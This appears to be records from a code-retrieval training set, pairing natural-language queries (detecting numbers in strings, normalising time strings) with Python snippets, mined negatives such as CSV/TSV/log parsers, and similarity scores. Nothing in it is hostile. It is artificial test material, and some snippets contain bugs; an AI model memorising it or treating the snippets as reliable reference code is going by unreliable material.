logging.debug(\"A total of {0} sequences written to `{1}`.\".format(nseq, fastafile))", "def file_regex(line):\n # (size, month, day, hour, minute, filename)\n regex = r\"[-rwxd]{9}\\s\\d+\\s\\w*\\s[a-zA-Z0-9\\-]*\\s*(\\d*)\\s(\\w{3})\\s+(\\d{1,2})\\s(\\d{2})\\:(\\d{2})\\s([^\\n]+)\"#\\n\"\n lst = re.findall(regex, line)\n t = lst[0]\n lst = [int(t[0]), t[1], int(t[2]), int(t[3]), int(t[4]), t[5]]\n t = tuple(lst) \n return t", "def create_table(file_to_use):\n lines = []\n for line in file_to_use:\n lines.append(line.split(\",\"))\n lines[-1][-1] = lines[-1][-1][:-1]\n return lines", "def _read_tsv(cls, input_file, quotechar=None):\n return readfile(input_file)", "def storeTabDelimitedFile(inputFile):\n\n\n list0 = []\n with open(inputFile, 'r') as f:\n newlist = f.readlines()\n #print(newlist)\n for i in range(len(newlist)):\n #newlist[i] = newlist[i].strip('\\t')\n newlist[i] = newlist[i].strip('\\n') # this makes the matrix easier to read as i will not be converting back to original format\n x = newlist[i].split('\\t') # everytime a tab appears in a lines string, the string is split and is storing data in a list\n list0.append(x)\n print(list0) # list0 is the matrix as it contains sublists and elements that can be individually accessed", "def _csv_download(page):\n # gc = gspread.login(page.timetable.google_user, page.timetable.google_passwd)\n gc = googleoauth.authenticate_google_docs()\n csv_file = gc.open('WebValley2019')\n\n # gsession = gss.Client(page.timetable.google_user, page.timetable.google_passwd)\n # ss = gss.Spreadsheet(page.timetable.spreadsheet)\n # csv_file = gsession.download(ss, gid=page.timetable.spreadsheet_gid)\n # read = csv_file.read()\n read = csv_file.worksheet('TIMETABLE').get_all_values()\n # print \"csv\", read\n return read", "def readFile(filename):\n\tfileRepo = repertoire + filename + extension # Position du fichier\n\ttabPositions = [] # Cree un tableau vide\n\tdictPosition = {} # Cree un dictionnaire vide\n\ttry:\n\t\t# Ouvre en mode lecture\n\t\t# La methode with ferme le fichier automatiquement\n\t\twith open(fileRepo, \"r\") as robFile:\n\t\t\tcontenu = robFile.read().splitlines()\n\t\tassert contenu[0] == filename # Controle si le fichier correspond\n\texcept AssertionError:\n\t\treturn 1\n\texcept:\n\t\treturn 0 # Retourne 0 en cas d'erreur\n\telse:\n\t\tdel(contenu[0]) # Supprime le nom de fichier du contenu lisible\n\t\tfor line in contenu: # Parcours toutes les lignes\n\t\t\tif line == \"StepEnd\": # Si on arrive a la fin d'un pas\n\t\t\t\ttabPositions.append(dictPosition) # Ajoute l'etape dans le tableau\n\t\t\t\tdictPosition = {} # Vide le dictionnaire\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\t# Stock la position dans le dictionnaire\n\t\t\t\t\tdictPosition[int(line.split(\":\")[0])] = int(line.split(\":\")[1])\n\t\t\t\texcept ValueError:\n\t\t\t\t\t# Affiche la ligne qui contient l'erreur\n\t\t\t\t\tprint str(contenu.index(line)) + \" : \" + line\n\n\t\treturn tabPositions # Retourne le tableau rempli", "def read(self, filename=None, **kwargs):\n \n # --- Standard tests and exceptions (generic code)\n if filename:\n self.filename = filename\n if not self.filename:\n raise Exception('No filename provided')\n if not os.path.isfile(self.filename):\n raise OSError(2,'File not found:',self.filename)\n if os.stat(self.filename).st_size == 0:\n raise EmptyFileError('File is empty:',self.filename)\n try:\n from nptdms import TdmsFile\n except:\n raise Exception('Install the library nptdms to read this file')\n\n fh = TdmsFile(self.filename, read_metadata_only=False)\n # --- OLD, using some kind of old version of tdms and probably specific to one file\n # channels_address = list(fh.objects.keys())\n # channels_address = [ s.replace(\"'\",'') for s in channels_address]\n # channel_keys= [ s.split('/')[1:] for s in channels_address if len(s.split('/'))==3]\n # # --- Setting up list of signals and times\n # signals=[]\n # times=[]\n # for i,ck in enumerate(channel_keys):\n # channel = fh.object(ck[0],ck[1])\n # signals.append(channel.data)\n # times.append (channel.time_track())\n\n # lenTimes = [len(time) for time in times]\n # minTimes = [np.min(time) for time in times]\n # maxTimes = [np.max(time) for time in times]\n # if len(np.unique(lenTimes))>1:\n # print(lenTimes)\n # raise NotImplementedError('Different time length') \n # # NOTE: could use fh.as_dataframe\n # if len(np.unique(minTimes))>1:\n # print(minTimes)\n # raise NotImplementedError('Different time span') \n # if len(np.unique(maxTimes))>1:\n # print(maxTimes)\n # raise NotImplementedError('Different time span') \n # # --- Gathering into a data frame with time\n # time =times[0]\n # signals = [time]+signals\n # M = np.column_stack(signals)\n # colnames = ['Time_[s]'] + [ck[1] for ck in channel_keys]\n # self['data'] = pd.DataFrame(data = M, columns=colnames)\n # --- NEW\n self['data'] = fh\n\n #for group in fh.groups():\n # for channel in group.channels():\n # #channel = group['channel name']\n # print('Group:',group.name , 'Chan:',channel.name)\n # channel_data = channel[:]\n # if len(channel_data)>0:\n # print(' ', type(channel_data))\n # #print(' ', len(channel_data))\n # print(' ', channel_data)\n # print(' ', channel_data[0])\n # try:\n # print(channel.time_track())\n # except KeyError:\n # print('>>> No time track')", "def _get_parsed_files(self):\n\n parsed = []\n with Historical_ROAs_Parsed_Table() as t:\n for row in t.execute(f'SELECT * FROM {t.name}'):\n parsed.append(row['file'])\n return parsed", "def fileReader(filename):\n try:\n openfile = open(filename, 'r')\n urls = openfile.read()\n openfile.close()\n return urls\n except IOError:\n print \"File tidak ada\"\n exit()", "def parse_lines(filename):\n line_counter = 0\n with open(filename, 'r') as rf:\n for line_txt in rf:\n try:\n d = json.loads(line_txt)\n tup = (\n d['attributed_to'],\n int(d['date_time'][8:10]),\n d.get('used_first_time_today', False),\n d.get('first_utm_source', 'unknown') \n )\n except:\n print('Error parsing line_txt:', line_txt)\n line_counter += 1\n if line_counter % 10 ** 6 == 0:\n print('read %dM lines' % (line_counter // 10 ** 6))\n yield tup # yield: https://stackoverflow.com/a/231855", "def get_fping_rtt(self, filename):\n df = self.parse_fping(filename)\n df2 = df[['host', 'RTT']].groupby('host').describe().unstack()\n levels = df2.columns.levels\n labels = df2.columns.labels\n df2.columns = levels[1][labels[1]]\n return df2.T", "def f_open(loc):\n file = open(loc)\n t, U = [], []\n for l in file:\n data = l.split(\",\") # 3<=>t; 4<=>U\n t.append(float(data[3]))\n U.append(float(data[4]))\n return t, U", "def c_open(file):\n data = cassy.CassyDaten(file)\n t = data.messung(1).datenreihe(\"t\").werte\n I = data.messung(1).datenreihe(\"I_A2\").werte\n U = data.messung(1).datenreihe(\"U_B2\").werte\n return t, U, I", "def _read_tsv(file_path):\n translation_pairs = []\n with file_path.open() as f:\n # Note: the correct way to do this is with csv.DictReader, but some examples\n # have quote characters that confuse the csv parser. Since we know the\n # source never has its own tab or newline characters, basic Python string\n # manipulation is fine here, as long as the model doesn't predict tabs or\n # newlines.\n for line in f:\n line = line.strip()\n line = line.split('\\t')\n if len(line) != 2:\n raise ValueError(\n f'Line {line} could not be parsed. You may need to manually '\n 'replace tab or newline characters in the model output with '\n 'spaces.'\n )\n source, translation = line\n translation_pairs.append(\n evaluation.TranslationPair(source=source, translation=translation)\n )\n return translation_pairs", "def node_link_num(th_object, start, end, file_name, node1, node2, path):\n save_path = path + node1 + \"_\" + node2 + \"_vs_t.csv\"\n links_num = th_object.get_node_links_num(start, end, file_name, [node1, node2])\n with open(save_path, \"w+\") as f:\n f.write(\"Time,No_Link\\n\")\n for k in file_name:\n f.write(str(k)[11:-7] + \",\" + str(links_num[k]) + \"\\n\")\n print(node1 + \" \" + node2 + \" link number exported\")", "def link(self, fname):\n return fname", "def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n # if sys.version_info[0] == 2:\n # line = list(unicode(cell, 'utf-8') for cell in line)\n lines.append(line)\n return lines", "def _parse_lladdr(line):\n tokens = line.split()\n return tokens[1]", "def parse_table_file(file):\n\n rows = [row for row in csv.reader(file.decode().splitlines(), delimiter=\",\",\n doublequote=True, escapechar=None, quotechar='\"',\n quoting=csv.QUOTE_MINIMAL, skipinitialspace=True)]\n\n if len(rows) < 2:\n raise Exception(\"File must contain at least two rows.\")\n\n # get header\n attributes = rows[0]\n\n # go through the csv by row\n data = []\n for row in rows[1:]:\n data.append(row)\n\n if len(attributes) < 1:\n raise Exception(\"File must contain at least one column.\")\n\n return attributes, data", "def file_parser(filename):\n LOG_FORMAT = \"%a %l %u %t \\\"%r\\\" %>s %b %D\"\n\n line_parser = apache_log_parser.make_parser(LOG_FORMAT)\n\n parsed_entries = []\n\n with open(filename) as f:\n for line in f:\n parsed_entries.append(line_parser(line))\n\n # Sort the parsed log entries by timestamp. Some of the log entries in the\n # provided example take a long time to process so they are not in order,\n # this messes up splitting the entries into minute chunks for processing.\n parsed_entries.sort(key=lambda x: x.get('time_received_utc_datetimeobj'))\n\n return parsed_entries", "def tsv_generator(file):\n for line in fileinput.input(file):\n article, summary = line.strip().split(\"\\t\")\n yield (article, summary)", "def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n if sys.version_info[0] == 2:\n line = list(cell for cell in line)\n lines.append(line)\n return lines", "def parse_2015(year, file):\n with open(file) as file:\n content = file.read()\n # Place, Name, Age, Sex/plc, Sex, Time, Pace, City, State, Bib No,\n # Clock Time, Link (NOTE: not sure why omitting the link works, but it does)\n cols = [\n 'place', 'first_name', 'last_name', 'age', 'sexpl', 'sex',\n 'time', 'pace', 'city', 'state', 'bib', 'clocktime',\n ]\n parser = TDParser(columns=cols)\n parser.feed(content)\n return parser.results", "def get_table_from_file(file_name):\n try:\n with open(file_name, \"r\") as file:\n lines = file.readlines()\n\n table = [element.replace(\"\\n\", \"\").split(\"\\t\") for element in lines]\n\n nodes = list()\n for node in table:\n new_node = []\n for coordinate in node:\n new_node.append(float(coordinate))\n\n nodes.append(new_node)\n\n return nodes\n\n except FileNotFoundError as f:\n raise f from None\n except Exception as e:\n raise e from None", "def parse_tables_from_url(url, md_file):\n\n r = requests.get(url)\n parse_tables_from_html(r.text, md_file)", "def read_examples(file_name):\n start = time.time()\n print 'Reading examples from tab separated file...'\n count = 0\n i = 0\n with open(file_name, 'r') as fp:\n relation_examples = []\n for i, line in enumerate(fp):\n line.strip()\n if len(line) == 0 or len(line.split()) == 0:\n raise IOError\n else:\n fields = line.split('\\t')\n assert len(fields) == 9, \"a problem with the file format (# fields is wrong) len is \" + str(len(fields)) + \"instead of 9\"\n relation_examples.append([str(count)] + fields)\n count += 1\n print ' File contained {} lines'.format(i + 1)\n print ' Datapoints with valid features encoded: {}'.format(count)\n print ' Done in {:.2f} sec'.format(time.time() - start)\n return relation_examples", "def open_file(path):\r\n f = open(path, encoding='utf-8', errors='ignore')\r\n data = f.readlines()\r\n lst_with_data = []\r\n for i in data:\r\n i = i.replace('\"', ' ').replace(\"\\t\", ' ').replace(\"\\n\", \" \").replace(\"'\", ' ').split(' ')\r\n lst_with_data.append(i)\r\n res_lst = [] \r\n for i in lst_with_data:\r\n append_lst = []\r\n for j in i:\r\n if j.isdigit() or j == \"-\":\r\n append_lst.append(j) \r\n if len(append_lst) != 0: \r\n res_lst.append(append_lst) \r\n res_lst = res_lst[1:]\r\n res = [] \r\n for i in res_lst:\r\n if len(i) != len(res_lst[0]):\r\n i = i[1:]\r\n res.append(i) \r\n else:\r\n res.append(i) \r\n ln = len(res[0])\r\n data_by_years = []\r\n for i in range(ln):\r\n data_y = []\r\n for j in res:\r\n data_y.append(j[i])\r\n data_by_years.append(data_y) \r\n dict_by_years = {}\r\n dict_with_total = file_with_total_inform(\"Total_Lviv.csv\")\r\n for i in data_by_years:\r\n dict_by_years[int(i[0])] = causes(i)\r\n dict_by_years[int(i[0])].update({\"Total\": dict_with_total[i[0]]})\r\n res_dict = {}\r\n res_dict[\"Lviv\"] = dict_by_years \r\n return res_dict", "def readATPMatchesParseTime(dirname):\n\tallFiles = glob.glob(dirname + \"/atp_matches_\" + \"20??.csv\")\n\tallFiles = allFiles[:-1] ## avoid 2017 since its incomplete\n\tmatches = pd.DataFrame()\n\tcontainer = list()\n\tfor filen in allFiles:\n\t\tdf = pd.read_csv(filen,\n\t\t\t\t\t\t index_col=None,\n\t\t\t\t\t\t header=0,\n\t\t\t\t\t\t parse_dates=[5],\n\t\t\t\t\t\t encoding = \"ISO-8859-1\",\n\t\t\t\t\t\t date_parser=lambda t:parse(t)) ##errored out here\n\t\tcontainer.append(df)\n\tmatches = pd.concat(container)\n\treturn matches", "def read_locations(db, openfile):\n pass", "def fileReader(pathtofile, dateheading, dtformat='%m/%d/%Y %H:%M', offset=0):\n # Read the files\n dlist = []\n if pathtofile.endswith('.csv'):\n dfr = read_csv(pathtofile)\n if pathtofile.endswith('.xlsx'):\n dfr = read_excel(pathtofile)\n else:\n dfr = read_pickle(pathtofile)\n\n # Parsing the Date column\n dfr.insert(loc=0, column='Dates',\n value=to_datetime(dfr[dateheading],\n format=dtformat) + DateOffset(hours=offset))\n\n dfr.drop(dateheading, axis=1, inplace=True) # Drop original Time column\n\n # Add df to the dlist\n dlist.append(dfr)\n\n return dlist", "def parseFileLine(self, line):\n c = line.strip().split(\":\")\n return (c[0], c[1], c[2], c[3])", "def get_ap_file(self):\n with open(self.trendfile, 'r') as readfile:\n data = json.load(readfile)\n return data['trendtable']", "def yield_refs(filename):\n f = open(file)\n f.next() # ignore header line\n for row in csv.reader(f, delimiter='\\t'):\n # print row\n yield row[0]\n f.close()", "def parse(self, filehandle):\n l = filehandle.readline()\n if l.split()[0] != '##maf':\n return\n else:\n self.setpar(l.split()[1:])\n\n l=filehandle.readline()\n while l:\n la = l.split()\n## print la\n if(len(la)==0 or la[0]=='#'):\n## print \"skipping\"\n 1\n elif(la[0]=='a'):\n## print \"reading alignment\"\n self.readalign(la[1:], filehandle)\n else:\n## print \"end of records\"\n return\n\n l=filehandle.readline()", "def get_open_source_from_table(\n table: Sequence[Sequence[bs4.element.Tag]],\n team: Team,\n side: str,\n) -> Sequence[OpenSource]:\n open_sources = []\n for row in table:\n anchor = row[0].div.p.span.a\n filename = anchor.text\n url = anchor['href']\n date = row[1].div.p.text\n uploader = row[2].div.p.text\n open_source = OpenSource(team, side, filename, url, date, uploader)\n open_sources.append(open_source)\n return open_sources", "def fa2tab(filename):\n from Bio import SeqIO\n fo = open(filename,\"r\")\n fout = open(filename+\".tab\",\"w\")\n for seq in SeqIO.parse(fo, \"fasta\"):\n SeqIO.write(seq,fout,\"tab\")\n fo.close()\n fout.close()", "def _read_tsv(cls, input_file):\n with open(input_file, \"r\", encoding=\"cp1252\") as f:\n pre_lines = f.readlines()\n post_lines = []\n for line in pre_lines:\n post_lines.append(line.strip().split(\"\\t\"))\n return post_lines" ]
[ "0.6074462", "0.5697214", "0.55812126", "0.55209875", "0.5477201", "0.54759246", "0.544581", "0.5430003", "0.54228246", "0.53985965", "0.5344914", "0.53337824", "0.5330407", "0.53107756", "0.5296276", "0.5268797", "0.5236354", "0.52124465", "0.52045405", "0.51980215", "0.5169326", "0.5152859", "0.5128566", "0.5108838", "0.5084797", "0.5075781", "0.50628656", "0.50589466", "0.50581294", "0.5049722", "0.5047329", "0.50366104", "0.5024075", "0.50131744", "0.5008518", "0.50076044", "0.50018334", "0.5000637", "0.49966136", "0.49946126", "0.49876893", "0.49854004", "0.49826992", "0.49671692", "0.4962198", "0.4956656", "0.4954674", "0.49491882", "0.49472946", "0.4946349", "0.4943583", "0.4940704", "0.49404335", "0.49396843", "0.49387303", "0.49360952", "0.49324617", "0.49322906", "0.49285012", "0.49273345", "0.49198857", "0.49093258", "0.49089092", "0.4899449", "0.4896975", "0.48932236", "0.48876038", "0.48816636", "0.48799342", "0.4879928", "0.4875115", "0.48743582", "0.48740986", "0.48731765", "0.4870399", "0.48678958", "0.4863766", "0.48613626", "0.48610517", "0.4852676", "0.48507884", "0.48402163", "0.48377332", "0.48355508", "0.4833364", "0.48322442", "0.4827234", "0.48261616", "0.4824331", "0.48231533", "0.4821661", "0.4809927", "0.48051935", "0.48047346", "0.4794403", "0.47891736", "0.47887775", "0.47822076", "0.47809225", "0.47759843", "0.47710618" ]
0.0
-1
Function that returns true if a string contains a number
def hasNumbers(inputString): return any(char.isdigit() for char in inputString)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __has_numbers(self, input_string):\n return bool(re.search(r'\\d', input_string))", "def has_number(any_string):\n return any(char.isdigit() for char in any_string)", "def has_num(text):\n return any(str.isdigit(c) for c in text)", "def is_number(s):\r\n try:\r\n int(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_some_number(mystring):\n # print(Bcolors.cyan + re.findall(r\".*\\\\(.*)\", inspect.stack()[0][1])[0] + \" --- \"\n # + inspect.stack()[0][3] + \"()\" + Bcolors.ENDC)\n mystring = str(mystring)\n mystring = re.sub(\",\", \".\", mystring)\n try:\n if float(mystring):\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def isnum(self, x):\n\n return x in '1234567890.-'", "def string_contains_digits(self, string):\n return bool(self.compiledDigitRegex.search(string))", "def _contains_number(text):\n return any((True for n in xrange(10) if str(n) in text))", "def is_number(string):\r\n try:\r\n float(string)\r\n return True\r\n except ValueError: return False", "def is_number_repl_isnumeric(s):\n return s.replace('.', '', 1).isnumeric()", "def isNumber(string):\r\n for char in string:\r\n charNum = ord(char)\r\n if (charNum < 48 or charNum > 57):\r\n return False\r\n return True", "def is_number(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def isnumber(n):\r\n N = str(n)\r\n if N.isdigit():\r\n return True\r\n else:\r\n return False", "def is_number(c):\n return '0' <= c <= '9'", "def number_only(number):\n number = number.replace(' ', '')\n result = re.match(r\"^[0-9]+$\", number)\n if not result:\n return True\n return False", "def is_number(text):\n return text.lower() in AVRO_NUMBERS", "def is_valid_numeric(inString):\r\n return is_int(inString) or is_float(inString)", "def is_number_repl_isdigit(s):\n return s.replace('.', '', 1).isdigit()", "def only_numbers(string):\n for character in string[:-1]:\n if not (character.isdigit() or character in (',', ' ')): \n return False\n return True", "def is_number(str):\n\n # Local constants\n\n # Local variabes\n\n #****** start is_number() ******#\n\n try:\n float(str)\n return True\n except ValueError:\n return False", "def isNumber(word):\n try:\n int(word)\n return True\n except ValueError:\n return False", "def is_digit_regex(s: str) -> bool:\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def is_number(s):\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def isNumeric(string, needHexPrefix):\n return (True)", "def is_number_regex(s):\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def is_number_regex(s):\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def is_int(str_val: str) -> bool:\n\n return not (len(str_val) == 0 or any([c not in \"0123456789\" for c in str_val]))", "def is_number_regex(s):\n if re_match('^\\d+?\\.\\d+?$', s) is None:\n return s.isdigit()\n return True", "def is_number(s: Any) -> bool:\n try:\n int(s)\n return True\n except ValueError:\n pass\n\n try:\n float(s)\n return True\n except ValueError:\n pass\n\n return False", "def checkifnumber(self, test_string):\r\n try:\r\n float(test_string)\r\n return(True)\r\n except ValueError:\r\n return(False)", "def numbers_check(string, logger_=_LOGGER):\n valid_regex_0 = r\"\\d\"\n valid_regex_1 = r\"_\\d+_\\d+_\"\n valid_regex_2 = r\"_\\d+_\"\n if not re.search(valid_regex_0, string):\n logger.log(\n level=\"warning\",\n message='There are no numbers in the string \"' + string + '\"',\n logger=logger_,\n )\n return string\n if re.search(valid_regex_1, string):\n return string\n elif re.search(valid_regex_2, string):\n return string\n else:\n logger.log(\n level=\"warning\",\n message='Numbers not in valid expression. Valid values are \"_(['\n '0-9]+)_([0-9]+)_\" or \"_([0-9]+)_\"',\n logger=logger_,\n )\n return string", "def _is_number(s) -> bool:\n try:\n float(s)\n except ValueError:\n return False\n else:\n return True", "def isNumber(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def isNumber(s):\n\ttry:\n\t\tfloat(s)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False", "def is_number(str):\n try:\n float(str)\n return True\n except ValueError as e:\n print(e)\n try:\n unicodedata.numeric(str)\n return True\n except (TypeError, ValueError) as e:\n print(e)\n return False", "def is_num(var):\n try:\n int(var)\n return True\n except ValueError:\n return False", "def has_number(string):\n numbers = '0123456789'\n for letter in string:\n if letter in numbers:\n return True\n\n # End of the loop, we still didn't see any numbers, else we \n # woud have exited the function\n print(\"Your password doesn't contain any number\")\n return False", "def is_num(n):\n return '{} is a number'.format(n)", "def check_int(s):\n if s[0] in ('-', '+'):\n return s[1:].isdigit()\n return s.isdigit()", "def isAllDigits(self, word):\n return ((re.match('^\\d+$', word)) != None)", "def is_number_char(c: str) -> bool:\n return c.isdigit() or c == \".\"", "def must_contain_digit(cell):\n # Check if it's nan first\n if check_empty(cell):\n return True\n return not bool(re.search(\"\\d\", str(cell)))", "def is_number(self,s):\n try:\n float(s.replace(\" \", \"\"))\n return True\n except ValueError:\n return False", "def IsNumber(s):\n try:\n v = float(s)\n return True\n except ValueError:\n return False", "def _isnumber_with_thousands_separator(string):\n try:\n string = string.decode()\n except (UnicodeDecodeError, AttributeError):\n pass\n\n return bool(re.match(_float_with_thousands_separators, string))", "def isNumber(st):\n\treturn st.replace('.','',1).isdigit()", "def is_int(string:str) -> bool:\n try:\n int(string)\n return True\n except:\n return False", "def digitsOnly(s):\n return (s == ''.join([c for c in s if c in string.digits]))", "def only_int(p):\r\n if p.isdigit():\r\n return True\r\n return False", "def isnumeric(number):\n try:\n float(number)\n return True\n except (TypeError, ValueError):\n return False", "def isNumber(self, s):\n try:\n tmp = float(s)\n return True\n except:\n return False", "def checknum(val):\n\n if len(val) == 0:\n return False\n\n for i in range(len(val)):\n if not val[i].isdigit():\n return False\n\n return True", "def is_int(string):\n try:\n int(string)\n return True\n except ValueError:\n return False", "def is_number(s: Union[str, int, float]):\n if isinstance(s, str) and s.lower() == \"nan\":\n return True\n try:\n float(s)\n return True\n except ValueError:\n return False", "def IsNumeric(text):\n try:\n _ = float(text)\n except ValueError:\n return 0\n else:\n return 1", "def is_number(value):\n try:\n int(value)\n return True\n except (ValueError, TypeError):\n return False", "def is_number(num):\n try:\n float(num)\n return True\n except ValueError:\n return False", "def is_num_char(x):\n return ord('0') <= ord(x) <= ord('9')", "def is_number(number):\n try:\n float(number)\n return True\n except ValueError:\n return False", "def string_is_digit(string):\n valids = set([46, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57])\n plus_minus = set([43, 45])\n characters = list(string)\n\n #First character can be number or +/-\n if ord(characters[0]) not in valids.union(plus_minus):\n return False\n \n #Iterate to check all other characters\n for character in string[1:]:\n value = ord(character)\n if value not in valids:\n return False\n elif value == 46: # 46 = '.'\n valids.remove(46) # Only one period allowed\n return True", "def isnumber(x):\n try:\n float(x)\n return True\n except ValueError:\n return False", "def isAlphaNumeric(string):\n return (True)", "def is_number(n):\n\ttry:\n\t\tfloat(n)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False", "def ascii_numeric(s: str) -> bool:\n return frozenset(s).issubset(_ascii_n)", "def isindex(str):\n try:\n int(str)\n return True\n except ValueError:\n return False", "def check_for_integer(number):\r\n \r\n try:\r\n int(number) \r\n return True\r\n except ValueError:\r\n return False", "def validate_number(input_data):\n if input_data.startswith('-'):\n return input_data.i\n else:\n return False", "def __set_has_numeric(text=str):\n reg_ex = constants.NUMERIC_REG_EX_PATTERN\n if reg_ex.search(text) is None:\n return text\n return reg_ex.sub(constants.QUESTION_HAS_NUMERIC_KEY, text)", "def is_integer(self, string):\n try:\n return int(string)\n except:\n return False", "def is_positive_integer(string:str) -> bool:\n try:\n value = int(string)\n return value >= 0\n except ValueError:\n return False", "def _isDecimalNumber(strWord):\n return NumberFormula.DECIMALNUMBERREGEX.match(strWord) != None", "def is_numeric(value):\n return any([\n type(value) is str and value.isnumeric(),\n hasattr(value, 'is_integer') and value.is_integer(),\n type(value) is int,\n ])", "def is_digit_pound_star(string):\n return all([char.isdigit() or char in ('#', '*') for char in string])", "def slug_is_numerical(slug):\r\n try:\r\n float(slug)\r\n except ValueError:\r\n return False\r\n\r\n return True", "def isNumber(number):\n try:\n # Try to cast the string\n int(number)\n # The cast was successful\n return True\n # The cast was unsuccessful, the string is not a number\n except ValueError as err:\n # Write the exception in logging\n logging.exception(str(err))\n return False", "def _isnumber(string):\n if not _isconvertible(float, string):\n return False\n elif isinstance(string, (str, bytes)) and (\n math.isinf(float(string)) or math.isnan(float(string))\n ):\n return string.lower() in [\"inf\", \"-inf\", \"nan\"]\n return True", "def is_number_tryexcept(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def __is_int(self,string):\r\n try: \r\n int(string)\r\n return True\r\n except ValueError:\r\n return False", "def is_number_tryexcept(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def istele(number):\n if number[:3] == '140':\n return True\n return False", "def isInt(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def isint(s):\n try:\n x = int(s)\n return True\n except:\n return False", "def _is_num(w):\n symbols = list(w)\n for s in symbols:\n if s in string.digits:\n return '<NUM>'\n return w", "def is_number(number):\n if type(number) == type(1) or type(number) == type(0.1) or type(number) == type('') or type(u''):\n try:\n float(number)\n return True\n except ValueError:\n return False\n except TypeError:\n return False\n else:\n return False", "def is_number(value):\n try:\n float(value)\n return True\n except ValueError:\n return False", "def isFloat(string):\n return all(c in \"0123456789.\" for c in string)", "def is_number(value):\n try:\n float(value.replace(',', ''))\n except ValueError:\n return False\n return True", "def is_valid_integer(string_object: str):\n if string_object[0] == '-':\n return string_object[1:].isdigit()\n return string_object.isdigit()", "def input_validation(input_: str) -> bool:\n return fullmatch('[1-9]', input_) is not None", "def CheckNumber(userInput):\n try:\n float(userInput)\n return True\n except(ValueError):\n return False", "def isdigit(a):\n return _vec_string(a, bool_, 'isdigit')", "def is_numeric(val):\n if \\\n isinstance(val, int) or \\\n isinstance(val, float):\n return True\n elif \\\n isinstance(val, str) and \\\n val.isdigit():\n return True\n else:\n return False", "def isInt(string):\n try: int(string)\n except ValueError: return 0\n else: return 1", "def is_numeric(s):\n \n if s == False or s == None or s == \"\" or s == True:\n return False\n \n try:\n float(s)\n return True\n except (ValueError, TypeError):\n return False", "def represents_int(s):\n try:\n int(s)\n return True\n except ValueError:\n return False" ]
[ "0.86861813", "0.83668447", "0.82383734", "0.7930955", "0.79304606", "0.7924505", "0.78930366", "0.78647584", "0.77653086", "0.7743263", "0.7714202", "0.7706238", "0.77058214", "0.77046204", "0.77044505", "0.7690902", "0.766317", "0.7639565", "0.7527607", "0.7527464", "0.75087285", "0.74870706", "0.74678373", "0.74541515", "0.7438179", "0.74299467", "0.74299467", "0.74299467", "0.7428709", "0.740295", "0.740295", "0.7378684", "0.73763984", "0.7357792", "0.7337901", "0.73187816", "0.72719896", "0.72591233", "0.7254111", "0.72287524", "0.7228211", "0.7217498", "0.7202498", "0.71521497", "0.7145471", "0.7142101", "0.71344715", "0.71325696", "0.71054", "0.7103199", "0.7102365", "0.7035428", "0.7026263", "0.70180136", "0.69936544", "0.69815475", "0.6976326", "0.69481725", "0.6939355", "0.6938498", "0.69374955", "0.6925218", "0.691365", "0.68837976", "0.6876853", "0.68756247", "0.6867582", "0.6863585", "0.685189", "0.6847657", "0.682679", "0.6822987", "0.6820883", "0.68174416", "0.68153614", "0.6802655", "0.6796678", "0.6765303", "0.67582476", "0.670378", "0.66909367", "0.66698235", "0.66597223", "0.66495", "0.6643994", "0.66366434", "0.66207963", "0.66189146", "0.66148144", "0.66144764", "0.661039", "0.66019887", "0.65823054", "0.6552871", "0.65489084", "0.6545662", "0.6539343", "0.652843", "0.6523077", "0.6505182" ]
0.8393111
1
Small function to change time format. Used for make_time func
def tedoius_time(time_string): start = ['start', 'begin', 'beginning', 'head', 'first'] end = ['slut', 'end', 'tail', 'finish', 'finito', 'fin', 'done', 'finished'] if time_string.lower() in start: time_string = "00:00:00" # We need this exact string for later elif time_string.lower() in end: return time_string elif len(time_string) == 1: time_string = f"00:00:0{time_string}" elif len(time_string) == 2: time_string = f"00:00:{time_string}" elif len(time_string) == 3: time_string = f"00:00{time_string}" elif len(time_string) == 4: time_string = f"00:0{time_string}" elif len(time_string) == 5: time_string = f"00:{time_string}" elif len(time_string) == 6: time_string = f"00{time_string}" elif len(time_string) == 7: time_string = f"0{time_string}" elif len(time_string) > 8: raise('Time string too long!') return time_string
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
